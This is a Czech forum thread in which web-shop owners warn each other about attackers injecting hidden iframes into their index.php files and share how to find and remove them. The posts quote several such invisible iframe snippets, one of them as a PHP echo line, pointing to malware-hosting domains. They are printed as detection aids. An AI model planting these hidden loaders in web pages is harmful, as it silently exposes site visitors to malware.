Jump to content
Sign in to follow this  
platinum

Pozor na hackery !!!!

Recommended Posts

Několik klientů si stěžovalo.Že se jim změnil web.

Poslední 3-4 dny řádí čínnští hackeři a vkládají do indexů framy s malware.

Pokud někomu zmizela FO nebo máte pocit že se nezobrazuje spravně,Prohlédněte si zdroják.
a jestliže tam najdete podobné kody tomuto:

<iframe src="http://goooogleadsence.biz/?click=2CE0D69" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>


nebo

echo "<iframe src=\"http://goooogleadsence.biz/?click=2D26A1C\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";



<iframe src="http://superbetfair.cn/in.cgi?income44" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://superbetfair.cn/in.cgi?income43" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://nameashop.cn/in.cgi?income33" width=1 height=1 style="visibility: hidden"></iframe>



tak je třeba změna hesla k FTP a odstranění těchto kódů ze všech indexů.
Pokud používáte Totalcommander dejte si- hledat text : goooogleadsence. Nebo co budete mít ve framu.
A pak postupně všechny soubory ve kterých vám najte tyto texty (framy) opravit...

Dále mohou soubory obsahovat javascriptový řetězec obsahující v6dnebo v6c dejte vyhledat v6d nebo v6c

Zpravidla to vkládají na konec indexu.php,nebo mezi <body></body>

Share this post


Link to post
Share on other sites

To jsou pěkní sviňáci, strávil jsem tím celé odpoledne a nakonec byl vir i v souboru classes/subdomain.php. tak bacha na to

Share this post


Link to post
Share on other sites

Pod pojmem "řádění hackerů" bych si představil to, že napadnou a přímo pozmění stránku na webu. To, že máš zavirovanej počítač, hesla si v FTP klientovi ukládáš a proto ti je číňani ukradli, je něco jinýho.

Dělal jsem stejnou chybu, řešil jsem to 26.3. a PC jsem si infikoval na úvodní straně katalogu olomouckestranky.cz
Přes všechny aktualizace a zabezpečení tam mrcha stejně prolezla. Na pozadí se spustil program 1.exe a pořád dokola se pokoušel o zápis do registrů do seznamu programů spouštěných při startu. Nešel ukončit přes CtrlAltDel, ale naštěstí mně na ty jeho pokusy upozornil Adwatch.

Hočimini mně zapsali IFRAME do indexů (do všech, ve kterých je tag BODY) na dvou mých webech, vždycky hned na začátek BODY. Všude jsem to promazal a za pár dnů to tam bylo znova, protože jsem blbec nezměnil hesla k FTP.

Teď mám hesla jiný, v Commanderu ani ve Filezille si je neukládám, vždycky je tam ručně překopíruju z texťáku a je po problému.

Share this post


Link to post
Share on other sites

TC je v tom svým způsobem nevinně, i jiné managery souborů by na tom byly stejně jako TC, kdyby byly tak rozšířené, ale holt je moc lidi nepoužívají, tak zatím nejsou pro spamery tak zajímavé. Ostatně v tom článku je naznačeno, a to je fakt, že hlavní chybou je automatické ukládání hesel do čehokoliv bez firewallu a antiviru.
PS - Presta na tom není v tomhle ohledu vůbec lépe než zminovaný TC. Hesla do databáze jsou čitelná téměř i pro slepého. A slavný Outlook Expres, tam hesla a loginy jsou na sítovém snifferu vidět jak na běžícím pásu.

Share this post


Link to post
Share on other sites

Je otazkou, zdali pouzivate kvalitni firewall a jedete pokud mozno sifrovane. Nepustit do PC nic z venku.Nepouzivejte M$ utlouk, Internet Exprdel a doporucuju Sunbelt Personal Firewall.

Share this post


Link to post
Share on other sites
Je otazkou, zdali pouzivate kvalitni firewall a jedete pokud mozno sifrovane. Nepustit do PC nic z venku.Nepouzivejte M$ utlouk, Internet Exprdel a doporucuju Sunbelt Personal Firewall.


Tak Outlook používám a u TC jsem také zůstal, jen jsem zvolil neukládání přihlašovacích údajů. Mě se šmejd zapsal do všech index.php vždy na konec. U těchto indexů jsem nastavil atributy na 444 tak uvidíme o co se pokusí příště ...,

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More